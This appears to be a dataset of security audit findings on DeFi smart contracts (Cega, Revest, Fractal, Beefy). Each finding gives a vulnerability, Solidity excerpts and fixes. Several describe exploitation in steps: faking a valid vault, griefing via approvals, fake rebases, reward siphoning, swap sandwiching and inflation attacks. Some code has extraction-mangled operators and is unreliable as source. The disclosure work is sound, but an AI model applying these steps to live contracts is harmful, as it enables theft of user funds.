vaultMetadata.tradeExpiry; /) [ ...)) ] } This can be used to set an arbitrary address\u2019s vaultStart metadata property to a non- zero value, which would bypass the vaultAddress validity check. A malicious or compromised trader admin can cause the vault metadata of an arbi- trary address to look like a valid FCNVault. First, a malicious vault contract must be created. It must contain the following func- tions: 1. A totalSupply() function that returns a value greater than zero. 2. An empty deposit() function. 3. An empty redeem() function. Then, the malicious or compromised trader admin can take the following steps to set the malicious vault contract\u2019s vaultStart metadata property to a non-zero value. 1. Call openVaultDeposits() with the malicious vault address. This will set the vault\u2019s status to DepositsOpen. Zellic Sanic Pte. Ltd. 2. Call processDepositQueue() with the malicious vault address. This will set the vault\u2019s status to NotTraded. 3. Call setTradeData() with the _tradeExpiry set to a non-zero value, such that it is set to a time in the past. 4. Call sendAssetsToTrade() with the amount set to 0. This sets the vault\u2019s status to Traded. 5. Call calculateCurrentYield() with the malicious vault address. This will set the vault\u2019s status to TradeExpired. 6. Call calculateVaultFinalPayoff() with the malicious vault address. This will set the vault\u2019s status to PayoffCalculated. 7. Call collectFees() with the malicious vault address. This will set the vault\u2019s status to FeesCollected. 8. Call processWithdrawalQueue() with the malicious vault address. The withdrawal queue is empty, so this will just set the vault\u2019s status to WithdrawalQueueProces sed. 9. Call rolloverVault() with the malicious vault address. Both the require state- ments in the function will pass, and the vaultStart metadata property will be set to the _tradeExpiry value from step 3. Add the following check to rolloverVault(): function rolloverVault(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; require(vaultMetadata.vaultStart !) 0); /) Add this check /) [ ...)) ] } The client has acknowledged and fixed this issue by adding a vault address validity check to rolloverVault(). This was fixed in commit f64513a9. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Ability to deposit on other users\u2019 behalf", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium When a user calls addToDepositQueue(), they are required to pass the address of a receiver as the second argument. The function pulls an amount of asset tokens from the receiver via the use of safeTransferFrom(): function addToDepositQueue(uint256 amount, address receiver) public { require(isDepositQueueOpen, \u201c500:NotOpen\u201d); queuedDepositsCount += 1; queuedDepositsTotalAmount += amount; require(queuedDepositsTotalAmount + sumVaultUnderlyingAmounts <) maxDepositAmountLimit, \u201c500:TooBig\u201d); IERC20(asset).safeTransferFrom(receiver, address(this), amount); depositQueue.push(Deposit({ amount: amount, receiver: receiver })); emit DepositQueued(receiver, amount); } This implies that the receiver must preapprove the FCNProduct contract, as the saf eTransferFrom() will revert otherwise. Generally, the approval amount is set to the maximum uint256 value. This introduces a vector through which an attacker can de- posit more assets on behalf of the receiver at a later point in time. Consider the following scenario: 1. The victim decides they want to invest 1,000 USDC into an FCN product. 2. The victim max approves the FCNProduct contract and uses addToDepositQueu e() to invest 1,000 USDC. They have no intention of investing more than this amount. 3. Some amount of time later, the attacker notices that the victim\u2019s wallet has been transferred 50,000 USDC from elsewhere. Zellic Sanic Pte. Ltd. 4. The victim plans to use this USDC for other things, but the attacker now calls addToDepositQueue() with receiver set to the victim\u2019s address. 5. Since the victim has already approved the FCNProduct contract, this deposit will go through, and now the victim is at risk of losing a part of this money. The impact here is that the victim is griefed by the attacker. The attacker may or may not benefit from depositing funds on the victim\u2019s behalf, but the victim now stands to lose this money if, for example, the vault experiences a knock in event (a downside protection for user-deposited capital). There is also no way for the victim to cancel their deposit while it is in the deposit queue. We have noted that addToWithdrawalQueue() uses a similar pattern. However, we do not believe a similar attack vector exists there. We recommend removing the use of the receiver argument and instead pulling funds directly from msg.sender. The client has acknowledged and fixed this issue by removing the receiver parameter and using msg.sender instead. This was fixed in commit 4a95e773. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Missing status check in openVaultDeposits", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Low : Medium Before the depositQueue can be processed for a specific vault, that vault\u2019s status needs to be set to DepositsOpen. This can be achieved using the openVaultDeposits() func- tion: function openVaultDeposits(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; vaultMetadata.vaultStatus = VaultStatus.DepositsOpen; } This function does not check to ensure the vault is in the initial DepositsClosed status. A trader admin may accidentally, or through malicious intent, modify the status of any vault to DepositsOpen at any time from any arbitrary status. The vaults are designed to go through specific states in a certain order. If this order is not followed, the vault may end up in an unintended status, which could lead to any number of problems (e.g., the vault not functioning as intended). Add a preconditional status check to openVaultDeposits() to ensure that the vault is in a DepositsClosed status. The client has acknowledged and fixed this issue by adding a state check to openVaul tDeposits(). This was fixed in commit 455ab74c. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Missing sanity checks for crucial protocol parameters", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium The Cega smart contracts rely on a number of protocol parameters to function cor- rectly. There are functions that allow the admins of the protocol to alter most of these parameters. We found that the majority of these parameters are not checked to be within certain limits before they are set. The majority of these setter functions are only accessible by either the operator admin or the trader admin, both of which are non\u2013multi-sig wallets. In particular, the following functions are only accessible by either the operator admin or the trader admin. They are missing sanity checks on crucial protocol parameters before they are set: 1. setManagementFeeBps() - If set to 100%, it could lead to all investor funds being sent to the Cega fee recipient. Only accessible by the operator admin. 2. setYieldFeeBps() - Similar to setManagementFeeBps(). Only accessible by the operator admin. 3. setMaxDepositAmountLimit() - If set to 0, it will prevent the FCNProduct contract from accepting deposits, leading to denial of service. Only accessible by the trader admin. 4. setTradeData() - If the tradeExpiry parameter is set to hundreds of years in the future, funds would effectively be locked forever in the vault. Furthermore, the aprBps parameter can be set to a very high number. The trader admin can become an investor themselves and profit off of the high APR. Only accessible by the trader admin. 5. updateOptionBarrierOracle() and addOracle() - Allows full control over which oracle is used for a specific option barrier. Only accessible by the operator ad- min. 6. addOptionBarrier() and updateOptionBarrier() - If the strikeAbsoluteValue is set to 0, then a revert will occur when calculateVaultFinalPayoff() is called, as it will result in a division by 0 in calculateKnockInRatio(). Only accessible by the trader admin. Zellic Sanic Pte. Ltd. If the trader admin or operator admin roles are ever compromised or turn malicious, they would be able to set crucial protocol parameters to arbitrary values. This would cause the smart contracts to function incorrectly, and it may lead to loss of protocol or investors\u2019 funds in the worst case. Specifically, consider the setTradeData() function, which allows trader admins to mod- ify vault-specific metadata parameters. This function does not check the validity of the parameters. So, if a trader admin were to set the tradeExpiry parameter to a non- zero value that is less than the vaultStart configured in the createVault function, the collectFees() function would not be callable (i.e., the trader admin would be locked out of collecting fees). The collectFees() function internally calls the calculateFees() function, which has the following subtraction that would underflow: function calculateFees( FCNVaultMetadata storage self, uint256 managementFeeBps, uint256 yieldFeeBps ) public view returns (uint256, uint256, uint256) { /) [...))] uint256 numberOfDaysPassed = (self.tradeExpiry - self.vaultStart) / SECONDS_TO_DAYS; /) [...))] } Note that these parameters can be overridden by the default admin role (which is intended to be controlled by a multi-sig) using the setVaultMetadata() function, and therefore the impact is partially mitigated. Add sanity checks to these functions to ensure the parameters are within sane limits. The client has acknowledged and fixed this issue by adding the necessary sanity checks. This was fixed in commit a638c874. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Gas griefing using zero-value deposits and withdrawals", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Medium Severity: Low : Low Within the FCNProduct contract, users are able to submit deposits and withdrawals using the addToDepositQueue() and addToWithdrawalQueue() functions, respectively. Both these functions allow for zero-value deposits and withdrawals to be enqueued. The deposits and withdrawals are later processed by the processDepositQueue() and processWithdrawalQueue() functions, respectively. These functions are intended to be called by a trader admin, and they do not distinguish between zero-value and non\u2013 zero-value deposits and withdrawals. This means the same amount of gas will be used in both instances. An attacker that wants to grief the protocol into wasting gas can choose to add a lot of zero-value deposits or withdrawals. The only way to empty the queues are with the aforementioned processing functions; thus, the trader admin will be forced to waste gas on these zero-value deposits and withdrawals. Ensure that a user must deposit or withdraw a minimum amount of tokens. The client has acknowledged and fixed this issue by setting a minimum deposit and withdrawal amount. This was fixed in commit 1944cc8f. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Missing checks and some access controls on critical func- tions", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Business Logic Likelihood: N/A As explained by Cega, Severity: Informational : Informational The knock-in (KI) feature provides downside protection for investors\u2019 deposited capital. Specifically, investors will receive 100% of their initial investment in the FCN even if crypto asset prices are falling. In this case, unless crypto asset prices fall by 50% or more versus the day the vault started, investors\u2019 capital will be protected (unlike vanilla option strategies). If however the FCN does KI, the prin- cipal returned at expiry is equal to the lesser of 100% or the fallen asset price percentage of its initial price. To determine if a knock-in event has occurred, Cega uses option barriers. It is safe to assume that investors will choose their investments by carefully consid- ering a few factors. One of these factors may be to check what the knock-in barrier level is set to in relation to the price volatility of the option asset tokens. For example, if the token price is highly volatile, and the knock-in barrier level is at 90%, then there is a high chance that a knock-in event will occur, which may cause the investor to decide against investing in that specific vault. Currently, there exists three functions that the trader admin can use to add, update, and remove knock-in barriers. These are the addOptionBarrier(), updateOptionBarr ier(), and removeOptionBarrier() functions, respectively. An important characteris- tic of these functions is that they do not require the vault to be in any specific state, meaning the trader admin can add or update option barriers at any time, even after the investor\u2019s deposits are locked in. Furthermore, the parameters of a knock-in barrier can be arbitrary, as there are no sanity checks to ensure they are within certain limits. function addOptionBarrier(address vaultAddress, OptionBarrier calldata optionBarrier) public onlyTraderAdmin { FCNVaultMetadata storage metadata = vaults[vaultAddress]; Zellic Sanic Pte. Ltd. metadata.optionBarriers.push(optionBarrier); metadata.optionBarriersCount+); } This will reduce the investor\u2019s trust in the protocol because although they might note a very low knock-in barrier level initially (i.e., a low chance of a knock-in event oc- curring), they will know that the level may be raised at any moment, which makes the investment inherently risky. There also exists a setKnockInStatus() function that the trader admin can use to ar- bitrarily set a vault\u2019s knock-in status to true. Finally, the trader admin can also use the oracle\u2019s updateRoundData() function to arbi- trarily control the option asset token price returned by the oracle. This could also be used to trigger a knock-in event. Investors\u2019 trust in the protocol is significantly reduced due to missing checks and in- correct access controls in critical state-modifying functions. For the option barrier functionality, consider requiring a vault state of VaultStatus.No tTraded to modify any option barriers in the vault. For the setKnockInStatus() function, consider removing it completely. Alternatively, place it behind the onlyDefaultAdmin modifier instead. For the updateRoundData() function, consider changing its access control such that only the default admin multi-sig or the operator admin role can call it. The client has acknowledged and fixed all of the above issues according to our rec- ommendations. This was fixed in commit 834fe7ed. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Griefing opportunity may cause users to lose funds", + "labels": [ + "Zellic" + ], + "body": "Target: TokenVault.sol Category: Business Logic Likelihood: High Severity: High : High The calculation of lastMul to account for rebase tokens is incorrect and can lead to devaluation of user funds deposited in the vault. function updateBalance(uint fnftId, uint incomingDeposit) internal { ...)) if(asset !) address(0)){ currentAmount = IERC20(asset).balanceOf(address(this)); } else { /) Keep us from zeroing out zero assets currentAmount = lastBal; } tracker.lastMul = lastBal == 0 ? multiplierPrecision : multiplierPrecision * currentAmount / lastBal; ...)) } The TokenVault supports rebase tokens with a dynamic supply to achieve certain eco- nomic goals, such as pegging a token to an asset. In TokenVault, we can see that the currentAmount is the balance of the TokenVault di- vided by lastBal. This checks whether the asset has rebased since the last interaction, signaling an increase or decrease in supply. However, an attacker may transfer ERC20 tokens directly to the vault, inflating curr entAmount, leading to an inflated lastMul, thus emulating a rebase. The deposit with inflated lastMul would be devalued when lastMul is reset back in the next updateBal ance call. Zellic Revest Finance Proof of Concept A sample proof-of-concept can be found here. The output is as follows: Minted one FNFT with id \u2212> 0 Current value of FNFT\u22120 is 10 Transferred 10 tokens to fake a rebase Minted another FNFT with id \u2212> 1 and 100 depositAmount The value should be 100 But the value is 50 The PoC mints two FNFTs. The first one proceeds as normal. Then, tokens are trans- ferred directly to the vault. This transfer emulates a \u201cfake\u201d rebase. As a result, when the second FNFT is minted, it has value 50 rather than the correct value of 100. The victim minting a FNFT following the fake rebase action permanently loses funds. This poses a very large griefing vector for Revest. Alter the logic to properly account for Rebase Tokens. The Revest team has fixed this issue by proposing a move to a new and improved TokenVaultV2 design, and by deprecating the handling of rebase tokens in TokenVault. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Certain functions\u2019 access controls are unnecessarily lax", + "labels": [ + "Zellic" + ], + "body": "Target: TokenVault.sol Category: Business Logic Likelihood: N/A Severity: N/A : N/A description function createFNFT(uint fnftId, IRevest.FNFTConfig memory fnftConfig, uint quantity, address from) external override { ...)) } The function createFNFT should not be external, as all of its\u2019 internal function calls are restricted to onlyRevestController. The issue currently has no security impact, but developers should abide by the prin- ciple of least privilege. Limiting a contract\u2019s attack surface is a crucial way to mitigate future risks and reduces the overall likelihood and severity of compromises. Add the onlyRevestController modifier to createFNFT to restrict access control. The issue has been acknowledged by Revest team. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Batched mints can be rejected by a single recipient", + "labels": [ + "Zellic" + ], + "body": "Target: FNFTHandler.sol Category: Business Logic Likelihood: Low Severity: Low : Low function mintBatchRec(address[] calldata recipients, uint[] calldata quantities, uint id, uint newSupply, bytes memory data) external override onlyRevestController { supply[id] += newSupply; fnftsCreated += 1; for(uint i = 0; i < quantities.length; i+)) { _mint(recipients[i], id, quantities[i], data); } } A batched mint from mintBatchRec is susceptible to being cancelled by a single recip- ient failing the ERC-1155 AcceptanceCheck Gas is wasted, and other willing recipients do not receive the FNFTs. The batched mint execution has to be retried. Recomendations Execute the batched mint in a try catch loop and refund if a mint fails. If intended, document this behaviour. The issue has been acknowledged by the Revest team, and a fix is pending. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.1 An attacker may claim risk-free rewards without risking their staked capital", + "labels": [ + "Zellic" + ], + "body": "Target: Vault.sol Severity: High : High Category: Business Logic Likelihood: High The Example Vault aims for an APR of 20%. At the beginning of every new period (1 day), the vault distributes the daily interest and calculates the new token price. The caveat here is that users can stake capital at the end of a period and reap rewards instantly at the beginning of the next period. Depositing on the last block before the start of new period and redeeming it in the next block would essentially guarantee an instant riskless profit. function compute () public { uint256 currentTimestamp = block.timestamp; /) solhint-disable-line not-rely-on-time uint256 newPeriod = DateUtils.diffDays(startOfYearTimestamp, currentTimestamp); if (newPeriod <= currentPeriod) return; for (uint256 i = currentPeriod + 1; i <= newPeriod; i++) { _records[i].apr = _records[i - 1].apr; _records[i].totalDeposited = _records[i - 1].totalDeposited; uint256 diff = uint256(_records[i - 1].apr) * USDF_DECIMAL_MULTIPLIER * uint(100)/ uint256(365); _records[i].tokenPrice = _records[i - 1].tokenPrice + (diff / uint256(10000)); _records[i].dailyInterest = _records[i - 1].totalDeposited * uint256(_records[i - 1].apr) / uint256(365) / uint256(100); } currentPeriod = newPeriod; } Zellic Fractal Protocol An attacker can effectively siphon out money from vaults without participating in the strategies or taking on any risk. The profit is directly dependent on attackers\u2019 capital. For a concrete example: With an APR of 20% and a capital of 1 Million USDC, the attacker can freely profit 540 dollars a day (0.054%) disregarding the gas fee. The profit scales linearly and for 10 million USDC, the profit would be $5400/day. There are multiple strategies that can be taken to address this: Lock the users capital for a minimum period of time to prevent instant with- drawals. Immediately forward funds to the yieldReserve, so a large deposit is not with- drawable instantly. The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Lack of slippage checks on DEX swaps", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple contracts Severity: High : High Category: Business Logic Likelihood: High In many separate areas of the project, interactions and swaps with Uniswap are han- dled through DexLibrary. There is no slippage check on these interactions and are thus vulnerable to market manipulation. function swap( uint256 amountIn, address fromToken, address toToken, IPair pair ) internal returns (uint256) { (address token0, ) = sortTokens(fromToken, toToken); (uint112 reserve0, uint112 reserve1, ) = pair.getReserves(); if (token0 != fromToken) (reserve0, reserve1) = (reserve1, reserve0); uint256 amountOut1 = 0; uint256 amountOut2 = getAmountOut(amountIn, reserve0, reserve1); if (token0 != fromToken) (amountOut1, amountOut2) = (amountOut2, amountOut1); safeTransfer(fromToken, address(pair), amountIn); pair.swap(amountOut1, amountOut2, address(this), ZERO_BYTES); return amountOut2 > amountOut1 ? amountOut2 : amountOut1; } Due the nature of most of the vulnerable methods being onlyOwner or onlyAdmin, the quantity of funds accumulated would be rather large along with the swap amount. An attacker could sandwich the the swap transaction, artificially inflating the spot price and profiting off the manipulated market conditions when the swap executes. Set the default slippage to 0.5% for Uniswap, customizable for bigger trades. Zellic Fractal Protocol The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potential lock-up of funds in FractalVaultV1 as anySwap Router is not approved", + "labels": [ + "Zellic" + ], + "body": "Target: FractalVaultV1.sol Severity: Medium : Medium Category: Business Logic Likelihood: Medium The FractalVaultV1 does not approve the anySwap router before executing anySwapOut- Underlying, and would fail all the withdrawal attempts. function withdrawToLayerOne(...))) { ...)) emit WithdrawToLayerOne(msg.sender, amount); anySwapRouter.anySwapOutUnderlying(anyToken, anyswapRouter, amount, chainId); } The FractalVaultV1 will never be able to withdraw to LayerOne. Though the recoverERC20 function can be used in an emergency to manually transfer funds as a backup func- tionality; however, this is likely not the intended flow of funds. Approve AnySwap router before anySwapOutUnderlying. The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Potential lock-up of funds in the event of insufficient AnySwap liquidity", + "labels": [ + "Zellic" + ], + "body": "Target: FractVaultV1.sol Severity: Low : Low Category: Business Logic Likelihood: Low AnySwap cross-chain transfers will provide the underlying token to the destination only if sufficient liquidity exists on AnySwap reserves. If not, AnySwap will mint a wrapped token (AnyToken) that can be redeemed later when liquidity is available. The FractVaultV1 does not handle that. Even if reserves are checked before executing a swap, since AnySwap is not atomic with no guarantee on order of transactions, simultaneous swaps by other users would lead to locked tokens. FractalVaultV1 currently has no way to redeem the AnyTokens to the underlying to- kens. However, the recoverERC20 method can be used by the owner to manually recover the anySwap tokens, mitigating this issue\u2019s impact. Add functionality to redeem AnyTokens to their underlying. The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Access Control functions should emit events", + "labels": [ + "Zellic" + ], + "body": "Target: Mintable.sol, Address- Whitelist.sol, Migrations.sol Severity: Informational : Informational Category: Access Control Likelihood: N/A Several methods in multiple contracts related to access control such as whitelisting and minter/burner roles do not emit events. In the case of a compromise, events allow for secure and early detection of breaches & security incidents. Add events to all functions relating to access control. The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Multiple internal inconsistencies", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple contracts Severity: Informational : Informational Category: Business Logic Likelihood: N/A In several areas of the project, internal inconsistencies were noted, such as lack of checks that were present in other areas, or non-standard practices in general. The respective areas are affected: FractalVaultV1: withdrawToLayerOne - No chainId Checks. Mintable.sol: DexLibrary.sol: convertRewardTokensToDepositTokens - lack of slippage checks mint - Transfer event should mint from address 0. mentioned. These issues are minor, and do not pose a security hazard at present. More broadly however, this is a source of developer confusion and a general coding hazard. Internal inconsistencies may lead to future problems or bugs. Avoiding internal inconsisten- cies also makes it easier for developers to understand the code and helps any potential auditors more quickly and thoroughly assess it. Consider changing the code to fix the inconsistencies. The issue has been acknowledged by Fractal. Zellic Fractal Protocol 3.7 Lack of documentation Target: Multiple contracts Severity: Informational : Informational Category: Business Logic Likelihood: N/A Several files in the project are lacking documentation, the following being: diffDays _daysToDate DateUtils.sol: DateUtils.sol: DateUtils.sol: DateUtils.sol: DateUtils.sol: Migrations.sol: setCompleted timestamp getYear _daysFromDate This is a source of developer confusion and a general coding hazard. Lack of doc- umentation, or unclear documentation, is a major pathway to future bugs. It is best practice to document all code. Documentation also helps third-party developers inte- grate with the platform, and helps any potential auditors more quickly and thoroughly assess the code. Add documentation to the affected functions. The issue has been acknowledged by Fractal. Zellic Fractal Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Fractal Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Risk of ERC-4626 inflation attack", + "labels": [ + "Zellic" + ], + "body": "Target: BeefyWrapper Category: Code Maturity Likelihood: N/A Severity: Informational : Informational Empty ERC-4626 vaults can be manipulated to inflate the price of a share and cause depositors to lose their deposits due to rounding in favor of the vault. In empty (or nearly empty) ERC-4626 vaults, deposits are at high risk of being stolen through front-running with a donation to the vault that inflates the price of a share. This is variously known as a donation or inflation attack and is essentially a problem of slippage. This attack allows malicious actors to steal deposits into pools, which will result in potentially notable losses for users. protection the For ERC4626Upgradeable OpenZeppelin contract used in BeefyWrapper.sol to the current version (4.9). attacks, we upgrading inflation suggest against The latest version of the ERC4626Upgradeable OpenZeppelin contract explains their proposed solution to this type of attack: The _decimalsOffset() corresponds to an offset in the decimal representation between the underlying asset\u2019s decimals and the vault decimals. This offset also determines the rate of virtual shares to virtual assets in the vault, which itself determines the initial exchange rate. While not fully preventing the attack, analysis shows that the default offset (0) makes it non-profitable, as a result of the value being captured by the virtual shares (out of the attacker\u2019s donation) matching the attacker\u2019s expected gains. With a larger offset, the attack becomes orders of magnitude more expensive than it is profitable. Zellic Beefy Finance This issue has been fixed by Beefy Finance in commit 39a7e1a. Zellic Beefy Finance 4 Threat Model This provides a full threat model description for various functions. As time permit- ted, we analyzed each function in the contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/Beefy Wrapper - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: BeefyWrapperFactory.sol Function: clone(address _vault) This function can be used to create a new clone of the BeefyWrapper contract using an immutable proxy that delegatecalls the wrapper contract code. Inputs", + "labels": [ + "Zellic" + ], + "body": "_vault \u2013 Control: Arbitrary. \u2013 Constraints: None. \u2013 : Address of the contract to clone. Branches and code coverage (including function calls) Intended branches Deploys the immutable proxy contract and calls initialize on it. 4\u25a1 Test coverage Function call analysis rootFunction -> IWrapper(proxy).initialize(...))) \u2013 What is controllable? All arguments; _vault is controlled and name and sy mbol are obtained by calling _vault. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts would abort the transaction; reentrancy is possible but not a con- cern. Zellic Beefy Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Beefy Wrapper - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: BeefyWrapper.sol Function: unwrap(uint256 amount) This function can be used to unwrap a given amount of wrapped tokens in exchange for the original Beefy tokens. Inputs", + "labels": [ + "Zellic" + ], + "body": "amount \u2013 Control: Arbitrary. \u2013 Constraints: None directly (user balance must be sufficient). \u2013 : Amount of tokens to be unwrapped. Branches and code coverage (including function calls) Intended branches Burns the specified amount of wrapped tokens and transfers the corresponding amount of vault tokens to the caller. \u25a1 Test coverage Negative behavior Reverts if the user balance is insufficient. \u25a1 Negative test Reverts if the transfer of unwrapped tokens fails. \u25a1 Negative test Function call analysis rootFunction -> _burn(msg.sender, amount) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible. rootFunction -> IERC20Upgradeable(vault).safeTransfer(msg.sender, amount ) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not controllable. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Zellic Beefy Finance Reverts bubble up (even though they should not be possible); reentrancy is not possible (vault is considered trusted). Function: wrap(uint256 amount) This function can be used to wrap a given amount of Beefy vault tokens into ERC-4626 wrapped tokens. Inputs amount \u2013 Control: Arbitrary. \u2013 Constraints: None (directly, caller balance must be sufficient and the wrapper must be approved). \u2013 : Amount to wrap. Branches and code coverage (including function calls) Intended branches Transfers vault tokens to the wrapper contract and mints the corresponding amount of wrapper tokens. \u25a1 Test coverage Negative behavior Reverts if the vault token transfer fails (e.g., user balance is insufficient). \u25a1 Negative test Function call analysis rootFunction -> IERC20Upgradeable(vault).safeTransferFrom(msg.sender, address(this), amount) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> _mint(msg.sender, amount) \u2013 What is controllable? amount. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Zellic Beefy Finance Reverts and reentrancy are not possible. Function: _deposit(address caller, address receiver, uint256 assets, ui nt256 shares) This internal function overrides the default ERC-4626 implementation and is invoked by the public, inherited functions deposit and mint. Inputs caller \u2013 Control: None. \u2013 Constraints: None. \u2013 : Caller performing the deposit. receiver \u2013 Control: Arbitrary. \u2013 Constraints: None. \u2013 : Receiver of the minted shares. asset \u2013 Control: Arbitrary (when coming from deposit). \u2013 Constraints: None (directly, caller balance must be sufficient). \u2013 : Amount of assets to wrap. shares \u2013 Control: Arbitrary (when coming from mint). \u2013 Constraints: None (directly, corresponding caller asset balance must be sufficient). \u2013 : Intended to be the amount of shares to mint but ignored and re- computed internally. Branches and code coverage (including function calls) Intended branches Transfers asset from the caller to the wrapper contract, calls the vault to deposit the asset, and mints the corresponding amount of shares to the receiver. \u25a1 Test coverage Negative behavior Reverts if the asset transfer fails (e.g., caller balance is insufficient). \u25a1 Negative test Reverts if the vault deposit fails. Zellic Beefy Finance \u25a1 Negative test Function call analysis rootFunction -> IERC20Upgradeable(asset()).safeTransferFrom(caller, address(this), assets) \u2013 What is controllable? assets. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (asset is considered trusted). rootFunction -> IERC20Upgradeable(vault).balanceOf(address(this)) \u2013 What is controllable? Nothing. \u2013 If return value controllable, how is it used and how can it go wrong? Used as the initial vault tokens\u2019 balance. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> IVault(vault).deposit(assets) \u2013 What is controllable? assets. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> shares = IERC20Upgradeable(vault).balanceOf(address(this )) \u2013 What is controllable? Nothing. \u2013 If return value controllable, how is it used and how can it go wrong? Used as the final vault balance \u2014 the difference between final and initial balance is used as the amount of shares to be minted. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible (vault is considered trusted). rootFunction -> _mint(receiver, shares) \u2013 What is controllable? Nothing directly. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts and reentrancy are not possible. Zellic Beefy Finance Function: _withdraw(address caller, address receiver, address owner, ui nt256 assets, uint256 shares) This internal function overrides the default ERC-4626 implementation and is invoked by the public, inherited functions withdraw and redeem. Inputs caller \u2013 Control: None. \u2013 Constraints: None. \u2013 : Caller performing the withdrawal. receiver \u2013 Control: Arbitrary. \u2013 Constraints: None. \u2013 : Receiver of the withdrawal. owner \u2013 Control: None. \u2013 Constraints: If not the sender, caller must have allowance. \u2013 : Owner of the shares to withdraw. assets \u2013 Control: Arbitrary (when coming from withdraw). \u2013 Constraints: None (directly, owner share balance must be sufficient). \u2013 : Amount of assets to unwrap. shares \u2013 Control: Arbitrary (when coming from redeem). \u2013 Constraints: None (directly, owner share balance must be sufficient). \u2013 : Amount of shares to unwrap. Branches and code coverage (including function calls) Intended branches Spends allowance if caller is not owner. \u25a1 Test coverage Burns owner shares, withdraws shares from the vault, transfers min(assets, b alance) to the receiver. \u25a1 Test coverage Negative behavior Reverts if the caller does not have sufficient allowance. Zellic Beefy Finance \u25a1 Negative test Reverts if owner balance is insufficient. \u25a1 Negative test Reverts if vault withdrawal fails. \u25a1 Negative test Reverts if asset transfer fails (should be impossible). \u25a1 Negative test Function call analysis rootFunction -> _spendAllowance(owner, caller, shares) \u2013 What is controllable? owner and shares. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Reverts bubble up; reentrancy is not possible. rootFunction -> _burn(owner, shares) \u2013 What is controllable? owner and shares. \u2013 If return value controllable, how is it used and how can it go wrong? Not used. \u2013 What happens if it reverts, 